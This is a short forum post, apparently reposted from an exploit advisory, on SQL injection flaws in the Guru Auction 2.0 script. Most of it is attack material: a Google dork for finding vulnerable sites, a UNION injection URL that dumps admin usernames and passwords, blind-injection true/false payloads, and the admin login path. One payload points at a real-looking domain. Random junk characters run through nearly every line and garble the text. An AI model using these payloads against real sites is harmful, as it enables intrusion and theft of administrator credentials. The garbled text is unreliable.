Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
O# V w; ?6 ?, t8 x9 Q6 m" u$ n4 l: }2 d+ ]
作者 : v3n0m' A$ D8 a& r' ]# e. q' h
应用 : Guru Auction 2.0
, s, y, a4 Z' b$ p* o: EPrice : $49
@& E# T' S, I' a8 x7 X9 aVendor : http://www.guruscript.com/
( z& H! M4 M) sGoogle Dork : inurl:subcat.php?cate_id=
3 y& r$ M! p9 k2 A' } ' _) z1 R$ W( q7 Q6 l, n: p+ }
SQLi p0c:
X$ z8 I6 v) g+ S7 X1 M* {& ^- O: [~~~~~~~~~~
1 j6 r# D# I: ~http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--% @- g; L, R' |# w
( s8 i* y1 {/ J) O& D4 T' d, Y
. w0 ]$ b" I; p9 S盲注 p0c:3 B: t& r& h- f+ R k
~~~~~~~~~~3 s4 b# X- `8 u
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true8 D& @1 `# u4 F) N7 A
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
0 z& x$ n- n I0 t. h2 H3 z 2 w" U, T, D n6 t% `
管理登录入口:
( T6 m* P- p! K+ ^& D* ~" N~~~~~~~~~~& p" I# ]* `1 i; s) l- d
http://domain.tld/[path]/admin/2 E. h+ A4 \* f& r/ c' h; M
|
发表于 2012-12-31 09:24:05
收藏
支持
反对